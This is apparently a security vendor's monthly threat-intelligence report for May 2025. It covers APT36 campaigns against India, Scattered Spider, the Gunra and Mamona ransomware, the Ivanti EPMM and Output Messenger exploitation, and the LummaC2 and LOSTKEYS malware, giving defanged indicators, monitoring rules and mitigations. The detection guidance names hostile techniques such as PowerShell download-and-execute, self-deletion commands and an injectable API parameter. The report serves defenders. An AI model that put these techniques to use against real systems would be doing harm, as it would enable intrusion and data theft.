Securonix Threat Labs Monthly Intelligence Insights – May 2025
Threat Research
Authors: Nitish Singh, and Nikhil Kumar Chadha
The Monthly Intelligence Insights provides a summary of top threats curated, monitored, and analyzed by Securonix Threat Labs in May 2025. The report additionally provides a synopsis of the threats; indicators of compromise (IoCs); tactics, techniques, and procedures (TTPs); and related tags. Each threat has a comprehensive summary from Threat Labs and search queries from the Threat Research team. For additional information on Threat Labs and related search queries used via Autonomous Threat Sweeper to detect the below-mentioned threats, refer to our Threat Labs home page.
Last month Securonix Autonomous Threat Sweeper identified and analyzed 3,059 TTPs and IoCs, 173 emerging threats, investigated 59 potential threats, and elevated 4 threat incidents. The top data sources swept against include IDS / IPS / UTM / Threat Detection, Data Loss Prevention, Endpoint Management Systems, and Email / Email Security.
Operation Sindoor (APT 36 Activity)
(Originally published in May 2025)
The Autonomous Threat Sweeper team saw heightened activity from APT36 group in May 2025. Throughout May 2025, India witnessed a sharp rise in targeted cyber operations linked to Pakistan-based Advanced Persistent Threat (APT) groups, primarily APT36 (Transparent Tribe) and SideCopy, amid escalating geopolitical tensions. The campaigns—ClickFix, Operation Sindoor, and broader hacktivist waves—used spear-phishing, spoofed infrastructure, and malware to infiltrate government, defense, and critical infrastructure sectors.
1. APT36-Linked ClickFix Campaign:
APT36 launched a deceptive campaign spoofing the Indian Ministry of Defence, delivering cross-platform malware using a ClickFix-style social engineering tactic.
- Infection Chain:
- Victims were lured via a cloned press release portal (email.gov.in.drdosurvey[.]info).
- Clicking a malicious “March 2025” link triggered platform-specific payloads:
- Windows: Delivered a .hta file using mshta.exe, linking to a .NET loader hosted on trade4wealth[.]in.
- Linux: Executed clipboard-based shell script (mapeal.sh) upon user interaction with a fake CAPTCHA.
- Payloads:
- Obfuscated JavaScript (sysinte.hta), dummy image loaders, and eventual delivery of decoy PDFs.
2. Cyber Attacks Following Baisaran Valley Attack:
Following the April 22nd terrorist attack in Pahalgam, cyber aggression intensified against Indian digital assets, with APT36 and pro-Pakistani hacktivist groups actively exploiting the incident as a phishing lure.
- APT36 Activity:
-
- Used themed files like “Report & Update Regarding Pahalgam Terror Attack.ppam” to deliver Crimson RAT.
- Malicious documents embedded with macros, leading to command-and-control (C2) activity and credential theft.
- Hacktivist Activity:
-
- Groups like HOAX1337, IOK Hacker, and National Cyber Crew carried out DDoS attacks, defacements, and credential harvesting against Indian educational and government sites.
- Groups like HOAX1337, IOK Hacker, and National Cyber Crew carried out DDoS attacks, defacements, and credential harvesting against Indian educational and government sites.
3. Operation Sindoor – Coordinated Cyber Siege
Operation Sindoor represents a strategically coordinated cyber offensive led by APT36 and SideCopy, blending state-sponsored espionage with hacktivism.
- Key Targets: Indian defense (MoD, DRDO), telecom (BSNL, Jio), healthcare (AIIMS), and government IT infrastructure (NIC, GSTN).
- Technical TTPs:
- Initial Access: Spear phishing with malicious .ppam, .lnk, .xlam, and .msi files.
- Execution: Scripts triggered web queries to fogomyart[.]com, followed by payload delivery from spoofed domains (zohidsindia[.]com, nationaldefensecollege[.]com).
- Persistence & Evasion:
- Use of LOLBins, PowerShell obfuscation, UAC bypass, scheduled tasks, and Ares RAT for remote control.
- Hacktivist Collaboration:
- 35+ groups conducted DDoS attacks and website defacements under hashtags like #OpIndia and #OperationSindoor via Telegram coordination.
- 35+ groups conducted DDoS attacks and website defacements under hashtags like #OpIndia and #OperationSindoor via Telegram coordination.
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these threat actor groups.
- Deploy advanced email security gateways capable of inspecting and detoning suspicious attachments (.ppam, .hta, .lnk, .xlam, .msi) in isolated environments. This helps detect macro-based droppers and prevent initial access via phishing.
- Enforce group policies to restrict abuse of native Windows binaries (LOLBins like mshta.exe, powershell.exe, regsvr32.exe) commonly used in APT36 campaigns. Deploy EDR solutions with script-blocking and behavior analytics capabilities.
- Update endpoint protection to detect clipboard-based payloads (used in ClickFix) and macro-enabled document behaviors. Monitor unusual clipboard actions and scripting activity triggered by user interaction with phishing pages or CAPTCHA overlays.
- Immediately block all identified malicious IPs, domains, and file hashes from the campaigns. Implement continuous monitoring for spoofed domains mimicking Indian government infrastructure using DNS filtering and threat intelligence feeds.
- 139 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the Operation Sindoor group include but are not limited to the following:
- Monitor for suspicious file extensions & macros execution
- Files with extensions: .xlam, .ppam, .lnk, .xlsb, .msi, .pptx.lnk
- Macro-enabled Office documents triggering:
- Command and control (C2) communication.
- Malicious scripts via embedded macros.
- Web queries using Invoke-WebRequest and wget.
- Monitor for use of trusted system tools (LOLBins like `mshta.exe` and `rundll32.exe`), obfuscated PowerShell scripts, encoded or compressed payloads, abuse of Task Scheduler for persistence, and methods to bypass User Account Control (UAC) to gain elevated privileges.
- Monitor for Mass login failures or scanning activities.
- Monitor for DDoS patterns with high traffic from VPS locations (Russia, Germany, Indonesia, Singapore).
- Monitor website defacements with politically motivated banners or messages.
TTPs related to the Cyber Attacks Following Baisaran Valley Attack include but are not limited to the following:
- Monitor for emails containing attachments with filenames like: “Report & Update Regarding Pahalgam Terror Attack.ppam” or “Agenda Points of Meeting of Dept of Defence…”
- Monitor for auto-executing macros (Auto_Open) that:
- Extract payloads using Shell.Application
- Use folder paths like \0ffice360-… (note the misleading use of “0” instead of “O”)
- Copy malicious files and rename system paths.
TTPs related to the APT36-Linked ClickFix Campaign include but are not limited to the following:
- Monitor for Windows systems executing mshta.exe to run HTA-based payloads retrieved from attacker-controlled URLs.
- Monitor to payloads tailored separately for Linux (mapeal.sh) and Windows (sysinte.hta) users. Linux script downloads a JPEG to appear benign; Windows script contains obfuscated JavaScript loading .NET-based malware.
Tags: Threat Actor: APT36, Transparent Tribe, SideCopy, Shadow Battalion | Target Location: India | Threat Actor Location: Pakistan | Target Sector: Government, Defense, Military, Diplomatic, Educational Institutions, Government IT, Healthcare, Telecom, Education | Target Systems: Windows, Linux, Microsoft Office (PowerPoint, Excel), Email Systems, Web Servers, Government Web Portals, Email Servers, Public Services | Delivery Mechanism: ClickFix-style infection chain, Cross-platform social engineering, Website cloning | Attack Vectors: Phishing, Social Engineering, Malicious Documents, Spearphishing Emails, Drive-by Download, Website Defacement, Spear Phishing, DDoS, Credential Harvesting | Tools Used: Crimson RAT, Malicious Macros, Embedded VBA, HTML Redirects | Malware: Crimson RAT, Ares RAT, SideCopy Loader, HTML Credential Phisher
Scattered Spider Activity
(Originally published in May 2025)
Scattered Spider, also known by aliases such as 0ktapus, UNC3944, Octo Tempest, Roasting 0ktapus, and Scatter Swine, is a financially motivated threat actor active since 2022. The group is responsible for a series of high-impact breaches, including those targeting MGM Resorts and Caesars, and has expanded its focus to sectors such as finance, insurance, telecommunications, BPO, retail (especially in the UK and US), food services, gaming, and technology. Known for its role as an access broker rather than a direct ransomware deployer, Scattered Spider enables operations for affiliates like DragonForce and BlackCat.
Their methods of initial access includes spearphishing via SMS or Telegram, impersonation of IT personnel, MFA fatigue attacks, and SIM swapping. Once inside, they target cloud platforms such as Azure AD, Microsoft 365, AWS, and Google Workspace. They maintain persistence using tools like AnyDesk, LogMeIn, and ConnectWise, while lateral movement is achieved through public virtual machines, infostealers, and RATs like RattyRAT. Credential theft and data exfiltration are carried out using tools such as Rclone and Dropbox, often paving the way for ransomware deployment by affiliates.
Scattered Spider is adept at evading security defenses, using stolen Microsoft-signed drivers like STONESTOP and POORTRY to disable endpoint detection and response (EDR) systems. They also exploit known vulnerabilities including CVE-2015-2291, CVE-2021-35464, and CVE-2024-37085. Their phishing infrastructure—hosted on low-cost platforms like DigitalOcean and Hostinger—frequently impersonates corporate IT systems (SSO, VPN) with vulgar POST paths and redirects, using TLS certificates from Let’s Encrypt or Sectigo. Campaigns often include AiTM phishing pages, mailbox rule manipulation, abuse of password resets, and residential proxies like NSOCKS and TrueSocks. Believed to be composed of young, native English speakers with links to cybercrime forums like Star Fraud and The Com, the group is suspected to have Eastern European origins and avoids targeting CIS countries.
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against the Scattered Spider threat group.
- Replace SMS-based MFA with phishing-resistant methods such as FIDO2 security keys or hardware tokens to prevent credential theft and SIM-swapping attacks exploited by Scattered Spider.
- Monitor for suspicious login behavior, including MFA fatigue, SIM swapping indicators, and unusual geolocation access.
- Block unauthorized remote access software (e.g., AnyDesk, LogMeIn, ConnectWise) and use allowlisting for approved tools.
- Continuously audit for RMM tool usage and privilege escalation attempts, especially those involving driver manipulation or signed malicious binaries.
- 152 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
Tags: Threat Actor: Scattered Spider, UNC3944 (aka 0ktapus, Roasted Oktapus, Octo Tempest, Scatter Swine, Muddled Libra) | Threat Actor Location: English-speaking, Suspected Eastern Europe; operates in Russian-speaking RaaS ecosystem | Target Location: United States, United Kingdom | Target Sector: Finance, Insurance, Retail, Food Services, Technology, Video Gaming, Telecommunications, Retail & eCommerce, Telecommunications, Cloud Service Providers, Cryptocurrency, Business Process Outsourcing (BPO) | Ransomware: BlackCat/ALPHV, DragonForce
Gunra and Mamona Ransomware Activity
(Originally published in May 2025)
In May 2025, notable ransomware threats, Gunra ransomware has significantly expanding its reach via advanced double extortion tactics to various sectors across multiple countries like Japan, Egypt, Italy etc. On the other hand, Mamona ransomware operates completely offline and removing the need for command-and-control (C2) servers or data theft.
Gunra Ransomware, a financially motivated threat group first observed in April 2025. The group has rapidly escalated its operations through the deployment of advanced double-extortion tactics involving both data encryption and exfiltration of sensitive data to maximize pressure on victims during ransom negotiations. The group targets a diverse range of sectors, including real estate, pharmaceuticals, and manufacturing and has demonstrated a broad geographical impact across Japan, Egypt, Panama, Italy, and Argentina. The ransomware predominantly infects Windows-based environment by leveraging advanced anti-analysis and evasion techniques such as process enumeration, debugger detection, and shadow copy deletion through Windows Management Instrumentation (WMI). It utilizes strong encryption algorithms and appends a [.]ENCRT extension to affected files and delivers a ransom note titled “R3ADM3.txt” in each affected directory. Communication with victims is facilitated through a Tor-based portal. Victims are given a strict five-day deadline including permanent data loss and public disclosure of exfiltrated information on underground forums. Gunra’s capabilities include evading detection, escalating privileges, and manipulating system processes.
Mamona ransomware represents a notable evolution within the commodity ransomware landscape, diverging from conventional Ransomware-as-a-Service (RaaS) models by operating entirely offline and eliminating the need for command-and-control (C2) infrastructure or data exfiltration. The ransomware was first observed in campaigns linked to BlackLock affiliates with ties to the Embargo group. Mamona employs a custom method to encrypt files with the [.]HAes extension instead of leveraging standard cryptographic libraries such as Windows CryptoAPI or OpenSSL. Notably, it leverages the Windows ping command to introduce execution delays and incorporates a self-deletion routine to reduce forensic traceability. It disseminates ransom notes named “README.HAes.txt” across the system and changes the desktop wallpaper to show that the system has been compromised. The ransomware’s offline operation, combined with the absence of external communication, significantly reduces its visibility to traditional network-based monitoring tools.
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy protective measures for increased threats from these ransomware campaigns.
- Enforce strict execution controls via AppLocker or Windows Defender Application Control (WDAC) to block unexpected shell command chains like cmd.exe /c ping && del.
- Disable or restrict execution from temporary folders and user profile paths, common drop zones for commodity ransomware.
- Deploy advanced anti-ransomware solutions leveraging behavioral analytics to identify file encryption activities in real time.
- Activate continuous file protection mechanisms on endpoint systems to monitor for the generation of encrypted files ([.]ENCRT extension) and block unauthorized processes from modifying critical data.
- Enforce User Account Control (UAC) policies rigorously to restrict unauthorized termination of system processes and prevent privilege escalation attempts.
- 4 IOCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the Gunra Ransomware include but are not limited to the following:
- Monitor for. ENCRT file extension.
- Monitor for the ransom note file R3ADM3.txt in every directory.
- Monitor for gunraransome.exe which creates processes in task manager.
- Monitor for GetCurrentProcess and TerminateProcess functions which are used for monitoring, privilege escalation, and injecting malicious code
TTPs related to the Mamona Ransomware include but are not limited to the following:
- Monitor for execution of ping 127[.]0[.]0[.]7 or other uncommon loopback IPs as delay tactics.
- Monitor for self-deletion attempts using cmd.exe /c del /f /q.
- Monitor for README.HAes.txt and changes to desktop wallpaper.
- Monitor for .HAes file extension patterns.
Tags: Ransomware Group: Mamona, Gunra Ransomware |Target Country: Japan, Egypt, Panama, Italy, and Argentina |Sector: Real estate, pharmaceuticals, and manufacturing
Ivanti EMM Exploit & Marbled Dust Activity
(Originally published in May 2025)
During this month’s threat activity, a Türkiye-affiliated group known as Marbled Dust was observed exploiting a zero-day vulnerability (CVE-2025-27920) in Output Messenger, a widely used enterprise chat platform. This ongoing campaign, active since April 2024, targets entities in Iraq particularly those aligned with the Kurdish military. The threat actor likely initiates access via DNS hijacking or typo squatting and then leverages a directory traversal flaw to deploy a Golang-based backdoor, enabling persistence and command-and-control communication.
Additionally, saw a China-aligned threat actor exploiting a critical vulnerability chain (CVE-2025-4427 and CVE-2025-4428) in Ivanti Endpoint Manager Mobile (EPMM), targeting critical infrastructure organizations across Europe, North America, and the Asia-Pacific region. The attackers use Java-based exploits to deliver “KrustyLoader,” which then installs a Sliver C2 implant for persistent access. The campaign’s focus is on cyber-espionage, including large-scale data exfiltration of credentials, Office 365 tokens, and mobile device metadata.
| CVE-2025-27920 | CVE-2025-27920 is a directory traversal vulnerability in the Output Messenger Server Manager application. It allows an authenticated attacker to upload arbitrary files to the server’s startup directory. The threat actor Marbled Dust exploited this as a zero-day to drop a malicious VBScript (OMServerService.vbs), establishing persistence on the compromised server. The vendor, Srimax, has released a patch to address this flaw. |
| CVE-2025-4427 | CVE-2025-4427 is an authentication bypass vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM). According to the report, it is the initial vulnerability in a two-part attack chain. On its own, it allows an attacker to circumvent authentication controls. In the observed campaign, a China-nexus actor uses it in conjunction with CVE-2025-4428 to enable unauthenticated remote code execution. |
| CVE-2025-4428 | CVE-2025-4428 is a code injection vulnerability in Ivanti EPMM. It is the second component of the attack chain and enables remote code execution. The China-nexus actor was observed exploiting this flaw by injecting Java-based commands into the format= parameter of a GET request to the /mifs/rs/api/v2/ endpoint. When chained with the CVE-2025-4427 authentication bypass, this vulnerability allows for a completely unauthenticated RCE. |
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy protective measures for increased threats from these vulnerabilities.
- Immediately update Output Messenger to a version not affected by the vulnerability: Windows (Version 2.0.63) and Server (Version 2.0.62)
- Implement phishing-resistant authentication for critical applications using Entra ID Conditional Access.
- Immediately apply the patches released by Ivanti to address vulnerabilities CVE-2025-4427 and CVE-2025-4428 in Ivanti EPMM.
- Enable the Attack Surface Reduction (ASR) rule to “Block executable files from running unless they meet a prevalence, age, or trusted list criterion.”
- 10 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the Marbled Dust include but are not limited to the following:
- Monitor for directory traversal attempts in file upload requests that indicate exploitation of the Output Messenger vulnerability (CVE-2025-27920).
- Monitor for the creation of malicious VBScript files, such as OMServerService.vbs or OM.vbs, within the Windows Startup folder.
- Monitor for the execution of a GoLang backdoor named OMServerService.exe, especially when it runs from the C:\Users\public\videos\ directory.
- Monitor for the legitimate chat client process, OMClientService.exe, spawning cmd.exe to execute commands received from a C2 server.
- Monitor for the use of plink.exe, the command-line PuTTY client, which the actor uses to create SSH tunnels for data exfiltration.
- Monitor for the sudden creation of large .rar archive files on user desktops, as this technique is used for staging data before theft.
TTPs related to the Chinese Threat Actor Exploiting Ivanti EMM Vulnerability include but are not limited to the following:
- Monitor for the web server process, such as Java or Tomcat, spawning unexpected child processes like /bin/bash, wget, curl, or fetch.
- Monitor for any files being downloaded to temporary directories like /tmp/ or /var/tmp/, followed by permission changes (chmod +x) and execution.
- Monitor for the malicious use of legitimate system tools, including mysqldump for database dumping and jcmd for process memory dumping.
- Monitor for any processes attempting to read sensitive configuration files, such as .mifpp or .spp2, to access hardcoded credentials.
- Monitor for command output being written to files that are masquerading as images, such as .jpg files located in web-accessible directories.
- Monitor for the download and execution of reverse proxy tools like FRP (frpc), which are used to establish a persistent C2 tunnel.
- Monitor for signs of process injection or anomalous memory usage, as the final Sliver payload is designed to be executed directly in memory.
Tags: Threat Actor: Marbled Dust, Sea Turtle, UNC1326, China-nexus Espionage Group | Vulnerabilities: CVE-2025-27920, CVE-2025-27921, CVE-2025-4427, CVE-2025-4428 | Malware: GoLang Backdoor, VBScript, KrustyLoader, Sliver, Auto-Color | Tools: Output Messenger, plink.exe (PuTTY), Ivanti EPMM, FRP (Fast Reverse Proxy), wget, curl, fetch, jcmd, mysqldump | Target Sectors: Government, Military, Telecommunications, Information Technology, Healthcare, Finance | Geolocation: Iraq, Middle East, Europe, North America, Asia-Pacific, China
LUMMAC.V2 and LOSTKEYS Used in Targeted Attacks
(Originally published in May 2025)
LummaC2, also known as Lummastealer or LUMMAC.V2, is a sophisticated C++ based infostealer first observed on Russian-language forums in 2022. It poses a significant threat, particularly to U.S. critical infrastructure, by targeting a wide range of sensitive data, including financial credentials, multi-factor authentication (MFA) details, cryptocurrency wallets, email clients, and password managers.
Primarily distributed through social engineering tactics like phishing emails and “ClickFix” CAPTCHA lures, LummaC2 tricks users into executing malicious PowerShell scripts disguised as legitimate software. To remain undetected, it employs an advanced arsenal of evasion techniques, including:
- Stealthy Execution: Operating in-memory to minimize forensic traces, using process hollowing and DLL hijacking.
- Defense Evasion: Incorporating anti-debugging, sandbox detection, and obfuscation to bypass EDR and antivirus solutions.
- Persistence: Modifying registry keys to maintain its presence on an infected system.
Once active, the malware fingerprints the system and communicates with its command-and-control (C2) servers using encrypted POST requests, often shielded by Cloudflare. Its modular design allows attackers to issue commands for data theft, remote file execution, screenshot capture, and self-deletion. All stolen data is packaged into ZIP archives before being exfiltrated.
Another one, LOSTKEYS is a newly identified malware deployed by the Russian state-sponsored threat group COLDRIVER (also known as UNC4057, Star Blizzard, or Callisto), marking a significant shift from their traditional credential phishing operations to direct malware deployment. Aimed at high-profile Western targets including government advisors, military personnel, NGOs, journalists, and individuals connected to Ukraine, the malware supports Russia’s cyberespionage objectives. Delivered through a multi-stage infection chain beginning with a fake CAPTCHA site that tricks users into executing PowerShell commands (“ClickFix” technique), LOSTKEYS evades detection using display resolution hash checks and employs a Base64-encoded PowerShell script to download a VBS decoder and a uniquely encrypted payload. Once active, the malware steals documents, system information, and running process data.
Threat Labs summary
Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these malware threats.
- Implement least privilege access controls across all user accounts and disable PowerShell for non-administrative users. Regularly audit system and registry changes to identify unauthorized persistence mechanisms, and leverage behavioral analytics to detect abnormal application behavior and suspicious network activity.
- Use endpoint protection tools or group policies to block the execution of unauthorized PowerShell scripts, MSHTA commands, and AutoIt binaries.
- Additionally, configure enterprise systems to block or restrict script-based command execution—particularly from untrusted sources—by default. Enforce least privilege principles to prevent users from performing administrative actions that could be exploited by malware such as LOSTKEYS.
- Use application allowlisting to prevent untrusted executables or scripts from running, especially from %APPDATA%, %TEMP%, or %LOCALAPPDATA% directories—common paths used by LUMMAC.V2 loaders.
- Deploy network-based detection rules to flag traffic matching LUMMAC.V2’s known C2 patterns (act=life, act=send_message) and inspect outbound ZIP uploads or unrecognized TLS sessions.
- 136 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.
TTPs related to the LummaC2/LUMMAC.V2 include but are not limited to the following:
- Monitor for execution of obfuscated PowerShell commands. PowerShell invoking web requests or downloading executables/scripts. PowerShell processes running without a visible window (-WindowStyle Hidden)
- Monitor for creation or modification of Run/RunOnce keys in the Windows Registry. Unexpected startup entries or scripts set for execution on boot/login.
- Monitor for PowerShell processes with -W Hidden or Invoke-WebRequest followed by Invoke-Expression (iex)—indicating fileless payload execution.
- Monitor for AutoIt scripts or batch files executing binaries with .a3x, .pif, or .bat extensions.
- Monitor for Registry modifications under: powershell.exe → setup.exe → <malicious DLL>
Tags: Threat Actor: COLDRIVER, UNC4057, Star Blizzard, Callisto | Threat Actor Location: Russia | Target Location: United States, Global (with focus on users searching for pirated software/media), Western countries (including U.S., U.K., Ukraine) | Target Sector: Critical Infrastructure, Financial Services, Government, Healthcare, Energy, Enterprise (corporate credentials), Personal users (passwords, browser data), Military, NGOs, Media, Think Tanks | Target System: Windows-based systems (Workstations & Servers), Windows OS, Applications including browsers, RDP clients, email clients, password managers | Initial Access: Phishing emails, ClickFix lures, Fake CAPTCHA pages, Social engineering (ClickFix CAPTCHA lure), Search engine manipulation (malicious SEO), Fake CAPTCHA with clipboard PowerShell execution (“ClickFix”) | Malware Type: Infostealer | Malware Family: LummaC2, LUMMAC.V2, Lummastealer | Malware/Tools: LOSTKEYS, PowerShell, VBS Decoder, Base64 Encoded Payloads, Fake CAPTCHA Lure
For a full list of the search queries used on Autonomous Threat Sweeper for the threats detailed above, refer to our Threat Labs home page. The page also references a list of relevant policies used by threat actors.
We would like to hear from you. Please reach out to us at scia@securonix.com.
Note: The TTPs when used in silo are prone to false positives and noise and should ideally be combined with other indicators mentioned.
Contributors: Dheeraj Kumar, and Sina Chehreghani
